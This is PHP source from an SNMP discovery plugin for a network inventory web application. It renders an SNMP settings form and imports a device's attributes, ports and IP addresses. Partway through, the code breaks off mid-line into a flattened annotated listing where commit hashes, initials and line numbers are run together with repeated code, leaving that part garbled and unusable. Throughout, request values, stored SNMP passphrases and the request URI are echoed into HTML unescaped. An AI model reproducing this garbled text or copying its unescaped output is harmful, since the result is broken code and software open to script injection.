	echo '<body onload="document.getElementById(\'submitbutton\').focus(); showsnmpv3(document.getElementById(\'snmpversion\')); shownewobject(document.getElementById(\'asnewobject\'));">';

	foreach( $endpoints as $key => $value) {
		$endpoints[$value] = $value;
		unset($endpoints[$key]);
	}
	unset($key);
	unset($value);

	foreach( getObjectIPv4Allocations($object_id) as $ip => $value) {

		$ip = ip_format($ip);

		if(!in_array($ip, $endpoints))
			$endpoints[$ip] = $ip;
	}
	unset($ip);
	unset($value);

	foreach( getObjectIPv6Allocations($object_id) as $value) {
		$ip = ip_format(ip_parse($value['addrinfo']['ip']));

		if(!in_array($ip, $endpoints))
			$endpoints[$ip] = $ip;
	}
	unset($value);

	/* ask for ip/host name on submit, see js checkInput() */
	$endpoints['-1'] = 'ask me';

	// saved snmp settings
	$snmpstr = strtok($object['comment'],"\n\r");
	$snmpstrarray = explode(':', $snmpstr);

	if($snmpstrarray[0] == "SNMP")
	{
		/* keep it compatible with older versions */
		switch($snmpstrarray[2])
		{
			case "1":
				$snmpstrarray[2] = 'v1';
				break;
			case "2":
			case "v2C":
				$snmpstrarray[2] = 'v2c';
				break;
			case "3":
				$snmpstrarray[2] = 'v3';
				break;
		}

		$snmpnames = array('SNMP','host', 'version', 'community');
		if($snmpstrarray[2] == "v3")
			$snmpnames = array_merge($snmpnames, array('sec_level','auth_protocol','auth_passphrase','priv_protocol','priv_passphrase'));

		$snmpvalues = array();
		foreach($snmpnames as $key => $value)
		{
			if(isset($snmpstrarray[$key]))
			{
				switch($key)
				{
					case 6:
					case 8:
						$snmpvalues[$value] = base64_decode($snmpstrarray[$key]);
						break;

					default: $snmpvalues[$value] = $snmpstrarray[$key];
				}
			}
		}

		unset($snmpvalues['SNMP']);

		$snmpconfig = $snmpvalues;
	}
	else
		$snmpconfig = array();

	$snmpconfig += $_POST;

	if(!isset($snmpconfig['host'])) {
		$snmpconfig['host'] = -1;

		/* try to find first FQDN or IP */
		foreach($endpoints as $value) {
			if(preg_match('/^[^ .]+(\.[^ .]+)+\.?/',$value)) {
				$snmpconfig['host'] = $value;
				break;
			}
		}
		unset($value);
	}

//	sg_var_dump_html($endpoints);

	if(!isset($snmpconfig['version']))
		$snmpconfig['version'] = mySNMP::SNMP_VERSION;

	if(!isset($snmpconfig['community']))
		$snmpconfig['community'] = getConfigVar('DEFAULT_SNMP_COMMUNITY');

	if(empty($snmpconfig['community']))
		$snmpconfig['community'] = mySNMP::SNMP_COMMUNITY;

	if(!isset($snmpconfig['sec_level']))
		$snmpconfig['sec_level'] = NULL;

	if(!isset($snmpconfig['auth_protocol']))
		$snmpconfig['auth_protocol'] = NULL;

	if(!isset($snmpconfig['auth_passphrase']))
		$snmpconfig['auth_passphrase'] = NULL;

	if(!isset($snmpconfig['priv_protocol']))
		$snmpconfig['priv_protocol'] = NULL;

	if(!isset($snmpconfig['priv_passphrase']))
		$snmpconfig['priv_passphrase'] = NULL;

	if(!isset($snmpconfig['asnewobject']))
		$snmpconfig['asnewobject'] = NULL;

	if(!isset($snmpconfig['object_type_id']))
		$snmpconfig['object_type_id'] = '8';

	if(!isset($snmpconfig['object_name']))
		$snmpconfig['object_name'] = NULL;

	if(!isset($snmpconfig['object_label']))
		$snmpconfig['object_label'] = NULL;

	if(!isset($snmpconfig['object_asset_no']))
		$snmpconfig['object_asset_no'] = NULL;

	if(!isset($snmpconfig['save']))
		$snmpconfig['save'] = true;

//	sg_var_dump_html($snmpconfig);

//	$snmpv3displaystyle = ($snmpconfig['version'] == "v3" ? "style=\"\"" : "style=\"display:none;\"");

	echo '<h1 align=center>SNMP Config</h1>';
	echo '<form method=post name="snmpconfig" onsubmit="return checkInput()" action='.$_SERVER['REQUEST_URI'].'>';

	echo '<table cellspacing=0 cellpadding=5 align=center class=widetable>
		<tr><th class=tdright>Host:</th><td>';

	//if($snmpconfig['asnewobject'] == '1' )
	if($snmpconfig['host'] != '-1' and !isset($endpoints[$snmpconfig['host']]))
		$endpoints[$snmpconfig['host']] = $snmpconfig['host'];

	echo getSelect ($endpoints, array ('id' => 'host','name' => 'host'), $snmpconfig['host'], FALSE);

	echo'</td></tr>
		<tr>
		<th class=tdright><label for=snmpversion>Version:</label></th>
		<td class=tdleft>';

	echo getSelect (array("v1" => 'v1', "v2c" => 'v2c', "v3" => 'v3'),
			array ('name' => 'version', 'id' => 'snmpversion', 'onchange' => 'showsnmpv3(this)'),
			$snmpconfig['version'], FALSE);

	echo '</td>
		</tr>
		<tr>
		<th id="snmp_community_label" class=tdright><label for=community>Community:</label></th>
		<th name="snmpv3" style="display:none;" class=tdright><label for=community>Security Name:</label></th>
		<td class=tdleft><input type=text name=community value='.$snmpconfig['community'].' ></td>
		</tr>
		<tr name="snmpv3" style="display:none;">
		<th></th>
		</tr>
		<tr name="snmpv3" style="display:none;">
		<th class=tdright><label>Security Level:</label></th>
		<td class=tdleft>';

	echo getSelect (array('noAuthNoPriv' => 'no Auth and no Priv', 'authNoPriv'=> 'auth without Priv', 'authPriv' => 'auth with Priv'),
			array ('name' => 'sec_level'),
			$snmpconfig['sec_level'], FALSE);

	echo '</td></tr>
		<tr name="snmpv3" style="display:none;">
		<th class=tdright><label>Auth Type:</label></th>
		<td class=tdleft>
		<input name=auth_protocol type=radio value=MD5 '.($snmpconfig['auth_protocol'] == 'MD5' ? ' checked="checked"' : '').'/><label>MD5</label>
		<input name=auth_protocol type=radio value=SHA '.($snmpconfig['auth_protocol'] == 'SHA' ? ' checked="checked"' : '').'/><label>SHA</label>
		</td>
		</tr>
		<tr name="snmpv3" style="display:none;">
		<th class=tdright><label>Auth Key:</label></th>
		<td class=tdleft><input type=password id=auth_passphrase name=auth_passphrase value="'.$snmpconfig['auth_passphrase'].'"></td>
		</tr>
		<tr name="snmpv3" style="display:none;">
		<th class=tdright><label>Priv Type:</label></th>
		<td class=tdleft>
		<input name=priv_protocol type=radio value=DES '.($snmpconfig['priv_protocol'] == 'DES' ? ' checked="checked"' : '').'/><label>DES</label>
		<input name=priv_protocol type=radio value=AES '.($snmpconfig['priv_protocol'] == 'AES' ? ' checked="checked"' : '').'/><label>AES</label>
		</td>
		</tr>
		<tr name="snmpv3" style="display:none;">
		<th class=tdright><label>Priv Key:</label></th>
		<td class=tdleft><input type=password name=priv_passphrase value="'.$snmpconfig['priv_passphrase'].'"></td>
		</tr>

		<tr>
		<th></th>
		<td class=tdleft>
		<input name=asnewobject id=asnewobject type=checkbox value=1 onchange="shownewobject(this)"'.($snmpconfig['asnewobject'] == '1' ? ' checked="checked"' : '').'>
		<label>Create as new object</label></td>
		</tr>';

//	$newobjectdisplaystyle = ($snmpconfig['asnewobject'] == '1' ? "" : "style=\"display:none;\"");

	echo '<tr name="newobject" style="display:none;">
		<th class=tdright>Type:</th><td class=tdleft>';

	$typelist = withoutLocationTypes (readChapter (CHAP_OBJTYPE, 'o'));
	$typelist = cookOptgroups ($typelist);

	printNiftySelect ($typelist, array ('name' => "object_type_id"), $snmpconfig['object_type_id']);

	echo '</td></tr>

		<tr name="newobject" style="display:none;">
		<th class=tdright>Common name:</th><td class=tdleft><input type=text name=object_name value='.$snmpconfig['object_name'].'></td></tr>
		<tr name="newobject" style="display:none;">
		<th class=tdright>Visible label:</th><td class=tdleft><input type=text name=object_label value='.$snmpconfig['object_label'].'></td></tr>
		<tr name="newobject" style="display:none;">
		<th class=tdright>Asset tag:</th><td class=tdleft><input type=text name=object_asset_no value='.$snmpconfig['object_asset_no'].'></td></tr>

		<tr>
		<th></th>
		<td class=tdleft>
		<input name=save id=save type=checkbox value=1'.($snmpconfig['save'] == '1' ? ' checked="checked"' : '').'>
		<label>Save SNMP settings for object</label></td>
		</tr>
		<tr><td colspan=2>

		<input type=hidden name=snmpconfig value=1>
		<input type=submit id="submitbutton" tabindex="1" value="Show List"></td></tr>

		</table></form>';

} /* snmpgeneric_snmpconfig */
function snmpgeneric_list($object_id) {

	global $sg_create_noconnector_ports, $sg_known_sysObjectIDs, $sg_portoifoptions, $sg_ifType_ignore;

	if(isset($_POST['snmpconfig'])) {
		$snmpconfig = $_POST;
	} else {
		showError("Missing SNMP Config");
		return;
	}

//	sg_var_dump_html($snmpconfig);

	echo '<body onload="document.getElementById(\'createbutton\').focus();">';

	addJS('function setchecked(classname) { var boxes = document.getElementsByClassName(classname);
		var value = document.getElementById(classname).checked;
		for(i=0;i<boxes.length;i++) {
			if(boxes[i].disabled == false)
				boxes[i].checked=value;
		}
	};', TRUE);

	$object = spotEntity ('object', $object_id);

	$object['attr'] = getAttrValues($object_id);

	$snmpdev = new mySNMP($snmpconfig['version'], $snmpconfig['host'], $snmpconfig['community']);

	if($snmpconfig['version'] == "v3" ) {
		$snmpdev->setSecurity( $snmpconfig['sec_level'],
					$snmpconfig['auth_protocol'],
					$snmpconfig['auth_passphrase'],
					$snmpconfig['priv_protocol'],
					$snmpconfig['priv_passphrase']
				);
	}

	$snmpdev->init();

	if($snmpdev->getErrno()) {
		showError($snmpdev->getError());
		return;
	}

	/* SNMP connect successful */

	showSuccess("SNMP {$snmpconfig['version']} connect to {$snmpconfig['host']} successful");

	echo '<form name=CreatePorts method=post action='.$_SERVER['REQUEST_URI'].'&module=redirect&op=create>';

	echo "<strong>System Information</strong>";
	echo "<table>";
//	echo "<tr><th>OID</th><th>Value</th></tr>";

	$systemoids = array('sysDescr', 'sysObjectID', 'sysUpTime', 'sysContact', 'sysName', 'sysLocation');
	foreach ($systemoids as $shortoid) {

		$value = $snmpdev->{$shortoid};

		if($shortoid == 'sysUpTime') {
			/* in hundredths of a second */
			$secs = (int)($value / 100);
			$days = (int)($secs / (60 * 60 * 24));
			$secs -= $days * 60 * 60 * 24;
			$hours = (int)($secs / (60 * 60));
			$secs -= $hours * 60 * 60;
			$mins = (int)($secs / (60));
			$secs -= $mins * 60;
			$value = "$value ($days $hours:$mins:$secs)";
		}

		echo "<tr><td title=\"".$snmpdev->lastgetoid."\" align=\"right\">$shortoid: </td><td>$value</td></tr>";

	}
	unset($shortoid);

	echo "</table>";

	/* sysObjectID Attributes and Ports */
	$sysObjectID['object'] = &$object;

	/* get sysObjectID */
	$sysObjectID['raw_value'] = $snmpdev->sysObjectID;
	//$sysObjectID['raw_value'] = 'NET-SNMP-MIB::netSnmpAgentOIDs.10';

	$sysObjectID['value'] = preg_replace('/^.*enterprises\.([\.[:digit:]]+)$/','\\1', $sysObjectID['raw_value']);

	/* try snmptranslate to numeric */
	if(preg_match('/[^\.0-9]+/',$sysObjectID['value'])) {
		$numeric_value = $snmpdev->translatetonumeric($sysObjectID['value']);

		if(!empty($numeric_value)) {
			showSuccess("sysObjectID: ".$sysObjectID['value']." translated to $numeric_value");
			$sysObjectID['value'] = preg_replace('/^.1.3.6.1.4.1.([\.[:digit:]]+)$/','\\1', $numeric_value);
		}
	}

	/* array_merge doesn't work with numeric keys !! */
	$sysObjectID['attr'] = array();
	$sysObjectID['port'] = array();

	$sysobjid = $sysObjectID['value'];

	$count = 1;

	while($count) {

		if(isset($sg_known_sysObjectIDs[$sysobjid])) {
			$sysObjectID = $sysObjectID + $sg_known_sysObjectIDs[$sysobjid];

			if(isset($sg_known_sysObjectIDs[$sysobjid]['attr']))
				$sysObjectID['attr'] = $sysObjectID['attr'] + $sg_known_sysObjectIDs[$sysobjid]['attr'];

			if(isset($sg_known_sysObjectIDs[$sysobjid]['port']))
				$sysObjectID['port'] = $sysObjectID['port'] + $sg_known_sysObjectIDs[$sysobjid]['port'];

			if(isset($sg_known_sysObjectIDs[$sysobjid]['text'])) {
				showSuccess("found sysObjectID ($sysobjid) ".$sg_known_sysObjectIDs[$sysobjid]['text']);
			}
		}

		$sysobjid = preg_replace('/\.[[:digit:]]+$/','',$sysobjid, 1, $count);

		/* add default sysobjectid */
		if($count == 0 && $sysobjid != 'default') {
			$sysobjid = 'default';
			$count = 1;
		}
	}

	$sysObjectID['vendor_number'] = $sysobjid;

	/* device pf */
	if(isset($sysObjectID['pf']))
		foreach($sysObjectID['pf'] as $function) {
			if(function_exists($function)) {
				/* call device pf */
				$function($snmpdev, $sysObjectID, NULL);
			} else {
				showWarning("Missing processor function ".$function." for device $sysobjid");
			}
		}

	/* sort attributes, maintain numeric keys */
	ksort($sysObjectID['attr']);

	/* DEBUG */
	//sg_var_dump_html($sysObjectID['attr'], "Before processing");

	/* needs PHP >= 5 foreach call by reference */
	/* php 5.1.6 doesn't seem to work */
	//foreach($sysObjectID['attr'] as $attr_id => &$attr)
	foreach($sysObjectID['attr'] as $attr_id => $value) {

		$attr = &$sysObjectID['attr'][$attr_id];

		if(isset($object['attr'][$attr_id])) {

			if(array_key_exists('key',$object['attr'][$attr_id]))
				$attr['key'] = $object['attr'][$attr_id]['key'];

			switch(TRUE) {

				case isset($attr['pf']):
					if(function_exists($attr['pf'])) {

						$attr['pf']($snmpdev, $sysObjectID, $attr_id);

					} else {
						showWarning("Missing processor function ".$attr['pf']." for attribute $attr_id");
					}

					break;

				case isset($attr['oid']):

					$attrvalue = $snmpdev->get($attr['oid']);

					if(isset($attr['regex'])) {
						$regex = $attr['regex'];

						if(isset($attr['replacement'])) {
							$replacement = $attr['replacement'];
							$attrvalue = preg_replace($regex, $replacement, $attrvalue);
						} else {
							if(!preg_match($regex, $attrvalue)) {
								if(!isset($attr['uncheck']))
									$attr['uncheck'] = "regex doesn't match";
							} else
								unset($attr['uncheck']);
						}
					}

					$attr['value'] = $attrvalue;

					break;

				case isset($attr['value']):
					break;

				default:
					showError("Error handling attribute id: $attr_id");

			}

		} else {
			showWarning("Object has no attribute id: $attr_id");
			unset($sysObjectID['attr'][$attr_id]);
		}

	}
	unset($attr_id);

	/* sort again in case attributes were added, maintain numeric keys */
	ksort($sysObjectID['attr']);

	/* print attributes */
	echo '<br>Attributes<br><table>';
	echo '<tr><th><input type="checkbox" id="attribute" checked="checked" onclick="setchecked(this.id)"></th>';
	echo '<th>Name</th><th>Current Value</th><th>new value</th></tr>';

	/* DEBUG */
	//sg_var_dump_html($sysObjectID['attr'], "After processing");

	foreach($sysObjectID['attr'] as $attr_id => &$attr) {

		$attr['id'] = $attr_id;

		if(isset($object['attr'][$attr_id]) && isset($attr['value'])) {

			if($attr['value'] == $object['attr'][$attr_id]['value'])
				$attr['uncheck'] = 'Current = new value';

			if(isset($attr['key']) && isset($object['attr'][$attr_id]['key']))
			{
				if($attr['key'] == $object['attr'][$attr_id]['key'])
					$attr['uncheck'] = 'Current = new key';
			}

			$value = $attr['value'];

			$val_key = (isset($object['attr'][$attr_id]['key']) ? ' ('.$object['attr'][$attr_id]['key'].')' : '' );
			$comment = '';

			if(isset($attr['comment'])) {
				if(!empty($attr['comment']))
					$comment = $attr['comment'];
			}

			if(isset($attr['uncheck'])) {
				$checked = '';
				$comment .= ', '.$attr['uncheck'];
			} else {
				$checked = ' checked="checked"';
			}

			$updateattrcheckbox = '<b style="background-color:#00ff00">'
						.'<input style="background-color:#00ff00" class="attribute" type="checkbox" name="updateattr['.$attr_id.']" value="'.$value.'"'
						.$checked.'></b>';

			$comment = trim($comment,', ');

			echo "<tr><td>$updateattrcheckbox</td><td title=\"id: $attr_id\">"
				.$object['attr'][$attr_id]['name'].'</td><td style="background-color:#d8d8d8">'
				.$object['attr'][$attr_id]['value'].$val_key.'</td><td>'.$value.'</td>'
				.'<td style="color:#888888">'.$comment.'</td></tr>';
		}
	}
	unset($attr_id);

	echo '</table>';

	$object['breed'] = sg_detectDeviceBreedByObject($sysObjectID);

	if(!empty($object['breed']))
		echo "Found Breed: ".$object['breed']."<br>";

	/* ports */

	/* get ports */
	amplifyCell($object);

	/* set array key to lowercase port name */
	foreach($object['ports'] as $key => $values) {
		$object['ports'][strtolower(shortenIfName($values['name'], $object['breed']))] = $values;
		unset($object['ports'][$key]);
	}

	$newporttypeoptions = getNewPortTypeOptions();

//	sg_var_dump_html($sysObjectID['port']);

	if(!empty($sysObjectID['port'])) {

		echo '<br>Vendor / Device specific ports<br>';
		echo '<table><tr><th><input type="checkbox" id="moreport" checked="checked" onclick="setchecked(this.id)"></th><th>ifName</th><th>porttypeid</th></tr>';

		foreach($sysObjectID['port'] as $name => $port) {

			if(array_key_exists(strtolower($name),$object['ports']))
				$disableport = TRUE;
			else
				$disableport = FALSE;

			$comment = '';

			if(isset($port['comment'])) {
				if(!empty($port['comment']))
					$comment = $port['comment'];
			}
			if(isset($port['uncheck'])) {
				$checked = '';
				$comment .= ', '.$port['uncheck'];
			} else {
				$checked = ' checked="checked"';
			}

			$portcreatecheckbox = '<b style="background-color:'.($disableport ? '#ff0000' : '#00ff00')
						.'"><input style="background-color:'.($disableport ? '#ff0000' : '#00ff00').'" class="moreport" type="checkbox" name="portcreate['.$name.']" value="'.$name.'"'
						.($disableport ? ' disabled="disabled"' : $checked ).'></b>';

			$formfield = '<input type="hidden" name="ifName['.$name.']" value="'.$name.'">';
			echo "<tr>$formfield<td>$portcreatecheckbox</td><td>$name</td>";

			if(isset($port['disabled'])) {
				$disabledselect = array('disabled' => "disabled");
			} else
				$disabledselect = array();

			foreach($port as $key => $value) {

				if($key == 'uncheck' || $key == 'comment')
					continue;

				/* TODO iif_name */
				if($key == 'porttypeid')
					$displayvalue = getNiftySelect($newporttypeoptions,
							array('name' => "porttypeid[$name]") + $disabledselect, $value);
					/* disabled form fields won't be submitted ! */
				else
					$displayvalue = $value;

				$formfield = '<input type="hidden" name="'.$key.'['.$name.']" value="'.$value.'">';
				echo "$formfield<td>$displayvalue</td>";
			}

			$comment = trim($comment,', ');
			echo "<td style=\"color:#888888\">$comment</td></tr>";
		}
		unset($name);
		unset($port);

		echo '</table>';
	}

	/* snmp ports */

	$ifsnmp = new ifSNMP($snmpdev);

	// needed for shortenIfName()
	$ifsnmp->object_breed = $object['breed'];

	/* ip spaces */

	$ipspace = NULL;
	foreach($ifsnmp->ipaddress as $ifindex => $ipaddresses) {

		foreach($ipaddresses as $ipaddr => $value) {
			$addrtype = $value['addrtype'];
			$netaddr = $value['net'];
			$maskbits = $value['maskbits'];
			$netid = NULL;
			$linklocal = FALSE;

			//echo "<br> - DEBUG: ipspace $ipaddr - $netaddr - $addrtype - $maskbits<br>";

			/* check for ip space */
			switch($addrtype) {
				case 'ipv4':
				case 'ipv4z':
					if($maskbits == 32)
						$netid = 'host';
					else
						$netid = getIPv4AddressNetworkId(ip_parse($ipaddr));
					break;

				case 'ipv6':

					if(ip_checkparse($ipaddr) === false)
					{
						/* format ipaddr for ip6_parse */
						$ipaddr = preg_replace('/((..):(..))/','\\2\\3',$ipaddr);
						$ipaddr = preg_replace('/%.*$/','',$ipaddr);
					}

					if(ip_checkparse($ipaddr) === false)
						continue(2); // 2 because of switch

					$ip6_bin = ip6_parse($ipaddr);
					$ip6_addr = ip_format($ip6_bin);
					$netid = getIPv6AddressNetworkId($ip6_bin);

					$node = constructIPRange($ip6_bin, $maskbits);

					$netaddr = $node['ip'];
					$linklocal = substr($ip6_addr,0,5) == "fe80:";

					//echo "<br> - DEBUG: ipspace $ipaddr - $addrtype - $maskbits - $netaddr - >$linklocal<<br>";

					break;

				case 'ipv6z':
					/* link local */
					$netid = 'ignore';
					break;
				default:
			}

			if(empty($netid) && $netaddr != '::1' && $netaddr != '127.0.0.1' && $netaddr != '127.0.0.0' && $netaddr != '0.0.0.0' && !$linklocal) {

				$netaddr .= "/$maskbits";
				$ipspace[$netaddr] = array('addrtype' => $addrtype, 'checked' => ($maskbits > 0 ? true : false));
			}
		}
		unset($ipaddr);
		unset($value);
		unset($addrtype);
	}
	unset($ifindex);
	unset($ipaddresses);

	/* print ip spaces table */
	if(!empty($ipspace)) {
		echo '<br><br>Create IP Spaces';
		echo '<table><tr><th><input type="checkbox" id="ipspace" onclick="setchecked(this.id)" checked="checked"></th>';
		echo '<th>Type</th><th>prefix</th><th>name</th><th width=150 title="reserve network and router addresses">reserve network / router addresses</th></tr>';

		$i = 1;
		foreach($ipspace as $prefix => $ipinfo) {

			$netcreatecheckbox = '<b style="background-color:#00ff00">'
					.'<input class="ipspace" style="background-color:#00ff00" type="checkbox" name="netcreate['
					.$i.']" value="'.$ipinfo['addrtype'].'"'.($ipinfo['checked'] ? ' checked="checked"' : '').'></b>';

			$netprefixfield = '<input type="text" size=50 name="netprefix['.$i.']" value="'.$prefix.'">';

			$netnamefield = '<input type="text" name="netname['.$i.']">';

			$netreservecheckbox = '<input type="checkbox" name="netreserve['.$i.']" checked="checked">';

			echo "<tr><td>$netcreatecheckbox</td><td style=\"color:#888888\">{$ipinfo['addrtype']}</td><td>$netprefixfield</td><td>$netnamefield</td><td>$netreservecheckbox</td></tr>";

			$i++;
		}
		unset($prefix);
		unset($ipinfo);
		unset($i);

		echo '</table>';
	}
' checked=\"checked\"' : '').'></b>'; 9276dc97 ME 1624 1625 $netprefixfield = '<input type="text" size=50 name="netprefix['.$i.']" value="'.$prefix.'">'; 1626 1627 $netnamefield = '<input type="text" name="netname['.$i.']">'; 1628 b67f998d 1629 $netreservecheckbox = '<input type="checkbox" name="netreserve['.$i.']" checked="checked">'; 9276dc97 1630 92ab1a62 1631 echo "<tr><td>$netcreatecheckbox</td><td style=\"color:#888888\">${ipspace['addrtype']}</td><td>$netprefixfield</td><td>$netnamefield</td><td>$netreservecheckbox</td></tr>"; 9276dc97 ME 1632 1633 $i++; 1634 } 1635 unset($prefix); 1636 unset($addrtype); 1637 unset($i); 1638 1639 echo '</table>'; 1640 } 1641 1642 ccf830c6 1643 echo "<br><br>ifNumber: ".$ifsnmp->ifNumber."<br>indexcount: ".$ifsnmp->indexcount."<br><table><tbody valign=\"top\">"; 9276dc97 ME 1644 1645 $portcompat = getPortInterfaceCompat(); 1646 1647 $ipnets = array(); 1648 c7fc6067 1649 $ifsnmp->printifInfoTableHeader("<th>add ip</th><th>add port</th><th>upd label</th><th title=\"update mac\">upd mac</th><td>upd port type</th><th>porttypeid</th><th>comment</th></tr>"); 9276dc97 ME 1650 1651 echo '<tr><td colspan="11"></td> 2141ed46 1652 <td><input type="checkbox" id="ipaddr" onclick="setchecked(this.id);" checked="checked">IPv4<br> 1653 <input type="checkbox" id="ipv6addr" onclick="setchecked(this.id);" checked="checked">IPv6</td> 9276dc97 1654 <td><input type="checkbox" id="ports" onclick="setchecked(this.id)"></td> 2141ed46 1655 <td><input type="checkbox" id="label" onclick="setchecked(this.id);" checked="checked"></td> 1656 <td><input type="checkbox" id="mac" onclick="setchecked(this.id);" checked="checked"></td> b9680799 1657 <td><input type="checkbox" id="porttype" onclick="setchecked(this.id);"></td></tr>'; 9276dc97 ME 1658 1659 foreach($ifsnmp as $if) { 1660 1661 $createport = TRUE; 1662 $disableport = FALSE; 1663 $ignoreport = FALSE; 1664 $port_info = NULL; c7fc6067 1665 $updatelabel = false; cb15032d 1666 $updateporttype = false; 9276dc97 ME 1667 1668 $updatemaccheckbox = ''; 1669 1670 $hrefs = array(); 1671 1672 $comment = ""; 1673 1674 if(trim($ifsnmp->ifName($if)) == '') { 1675 $comment .= "no ifName"; 1676 $createport = FALSE; 1677 } else { 1678 1679 if(array_key_exists($ifsnmp->ifName($if),$object['ports'])){ 1680 $port_info = &$object['ports'][$ifsnmp->ifName($if)]; 1681 $comment .= "Name exists"; c7fc6067 1682 1683 /* ifalias change */ 1684 if($port_info['label'] != $ifsnmp->ifAlias($if)) 1685 $updatelabel = true; 1686 9276dc97 ME 1687 $createport = FALSE; 1688 $disableport = TRUE; 1689 } 1690 } 1691 1692 if($ifsnmp->ifPhysAddress($if) != '' ) { 1693 1694 $ifPhysAddress = $ifsnmp->ifPhysAddress($if); 1695 1696 $l2port = sg_checkL2Address($ifPhysAddress); 1697 9276dc97 1698 if(!empty($l2port)) { c7fc6067 1699 9276dc97 ME 1700 $l2object_id = key($l2port); 1701 1702 $porthref = makeHref(array('page'=>'object', 'tab' => 'ports', 1703 'object_id' => $l2object_id, 'hl_port_id' => $l2port[$l2object_id])); 1704 1705 $comment .= ", L2Address exists"; 1706 $hrefs['ifPhysAddress'] = $porthref; 1707 $createport = FALSE; 1708 // $disableport = TRUE; 1709 $updatemaccheckbox = ''; 1710 } 1711 1712 $disablemac = true; 30bf198b 1713 if($disableport) { 9276dc97 ME 1714 if($port_info !== NULL) { 1715 if(str_replace(':','',$port_info['l2address']) != $ifPhysAddress) 1716 $disablemac = false; 1717 else 1718 $disablemac = true; 1719 } 1720 } else { 1721 /* port create always updates mac */ 1722 $updatemaccheckbox = '<b style="background-color:#00ff00">' 1723 .'<input 
style="background-color:' 1724 .'#00ff00" type="checkbox"' 1725 .' checked="checked"' 1726 .' disabled=\"disabled\"></b>'; 1727 } 1728 1729 if(!$disablemac) 1730 $updatemaccheckbox = '<b style="background-color:'.($disablemac ? '#ff0000' : '#00ff00').'">' 1731 .'<input class="mac" style="background-color:' 1732 .($disablemac ? '#ff0000' : '#00ff00').'" type="checkbox" name="updatemac['.$if.']" value="' 1733 .$object['ports'][$ifsnmp->ifName($if)]['id'].'" checked="checked"' 1734 .($disablemac ? ' disabled=\"disabled\"' : '' ).'></b>'; 30bf198b 1735 9276dc97 ME 1736 } 1737 1738 1739 $porttypeid = guessRToif_id($ifsnmp->ifType($if), $ifsnmp->ifDescr($if)); 1740 1741 if(in_array($ifsnmp->ifType($if),$sg_ifType_ignore)) { 1742 $comment .= ", ignore if type"; 1743 $createport = FALSE; 1744 $ignoreport = TRUE; 1745 } cb15032d 1746 else 1747 { 1748 if($port_info) 1749 { 1750 $ptid = $port_info['iif_id']."-".$port_info['oif_id']; 1751 if($porttypeid != $ptid) 1752 { 1753 $comment .= ", Update Type $ptid -> $porttypeid"; 1754 $updateporttype = true; 1755 } 1756 } 1757 } 30bf198b 1758 9276dc97 ME 1759 /* ignore ports without an Connector */ 1760 if(!$sg_create_noconnector_ports && ($ifsnmp->ifConnectorPresent($if) == 2)) { 1761 $comment .= ", no Connector"; 1762 $createport = FALSE; 1763 } 1764 9276dc97 ME 1765 /* Allocate IPs ipv4 and ipv6 */ 1766 1767 $ipaddresses = $ifsnmp->ipaddress($if); 30bf198b 1768 9276dc97 ME 1769 if(!empty($ipaddresses)) { 1770 1771 $ipaddrcell = '<table>'; 1772 1773 foreach($ipaddresses as $ipaddr => $value) { 1774 $createipaddr = FALSE; 1775 $disableipaddr = FALSE; 1776 $ipaddrhref = ''; 1777 $linklocal = FALSE; 30bf198b 1778 9276dc97 ME 1779 $addrtype = $value['addrtype']; 1780 $maskbits = $value['maskbits']; 1781 $bcast = $value['bcast']; 1782 30bf198b 1783 //echo "<br> - DEBUG: ip $ipaddr - $addrtype - $maskbits - $bcast<br>"; 1784 9276dc97 ME 1785 switch($addrtype) { 1786 case 'ipv4z': 1787 case 'ipv4': cc6eb4ee 1788 if($maskbits == 32) 1789 $bcast = "host"; 1790 9276dc97 ME 1791 $inputname = 'ip'; 1792 break; 30bf198b 1793 9276dc97 ME 1794 case 'ipv6z': 1795 $disableipaddr = TRUE; 1796 case 'ipv6': 1797 $inputname = 'ipv6'; 1798 2141ed46 1799 if(ip_checkparse($ipaddr) === false) 1800 { 1801 /* format ipaddr for ip6_parse */ 1802 $ipaddr = preg_replace('/((..):(..))/','\\2\\3',$ipaddr); 1803 $ipaddr = preg_replace('/%.*$/','',$ipaddr); 1804 } 30bf198b 1805 1fc7fc7d 1806 if(ip_checkparse($ipaddr) === false) 1807 continue(2); // 2 because of switch 1808 30bf198b 1809 /* ip_parse throws exception on parse errors */ 1810 $ip6_bin = ip_parse($ipaddr); 1811 $ipaddr = ip_format($ip6_bin); 1812 1813 $node = constructIPRange($ip6_bin, $maskbits); 1814 1815 $linklocal = ($node['ip'] == 'fe80::'); 9276dc97 ME 1816 1817 $createipaddr = FALSE; 1818 break; 1819 30bf198b 1820 } //switch 1821 1822 $address = getIPAddress(ip_parse($ipaddr)); 9276dc97 ME 1823 1824 /* only if ip not already allocated */ 1825 if(empty($address['allocs'])) { 30bf198b 1826 if(!$ignoreport) { 9276dc97 1827 $createipaddr = TRUE; 30bf198b 1828 } 9276dc97 ME 1829 } else { 1830 $disableipaddr = TRUE; 30bf198b 1831 9276dc97 1832 $ipobject_id = $address['allocs'][0]['object_id']; 30bf198b 1833 9276dc97 ME 1834 $ipaddrhref = makeHref(array('page'=>'object', 1835 'object_id' => $ipobject_id, 'hl_ipv4_addr' => $ipaddr)); 30bf198b 1836 9276dc97 1837 } 30bf198b 1838 9276dc97 ME 1839 /* reserved addresses */ 1840 if($address['reserved'] == 'yes') { 1841 $comment .= ', '.$address['ip'].' 
reserved '.$address['name']; 1842 $createipaddr = FALSE; 1843 // $disableipaddr = TRUE; 1844 } 1845 1846 if($ipaddr == '127.0.0.1' || $ipaddr == '0.0.0.0' || $ipaddr == '::1' || $ipaddr == '::' || $linklocal) { 1847 $createipaddr = FALSE; 1848 $disableipaddr = TRUE; 1849 } 1850 1851 if($ipaddr === $bcast) { 1852 $comment .= ", $ipaddr broadcast"; 1853 $createipaddr = FALSE; 1854 $disableipaddr = TRUE; 1855 } 1856 30bf198b 1857 if(!$disableipaddr) { 1858 $ipaddrcheckbox = '<b style="background-color:'.($disableipaddr ? '#ff0000' : '#00ff00') 1859 .'"><input class="'.$inputname.'addr" style="background-color:' 1860 .($disableipaddr ? '#ff0000' : '#00ff00') 1861 .'" type="checkbox" name="'.$inputname.'addrcreate['.$ipaddr.']" value="'.$if.'"' 1862 .($disableipaddr ? ' disabled="disabled"' : '') 1863 .($createipaddr ? ' checked="checked"' : '').'></b>'; 1864 } else { 1865 $ipaddrcheckbox = ''; 1866 } 9276dc97 ME 1867 1868 $ipaddrcell .= "<tr><td>$ipaddrcheckbox</td>"; 1869 30bf198b 1870 if(!empty($ipaddrhref)) { 9276dc97 1871 $ipaddrcell .= "<td><a 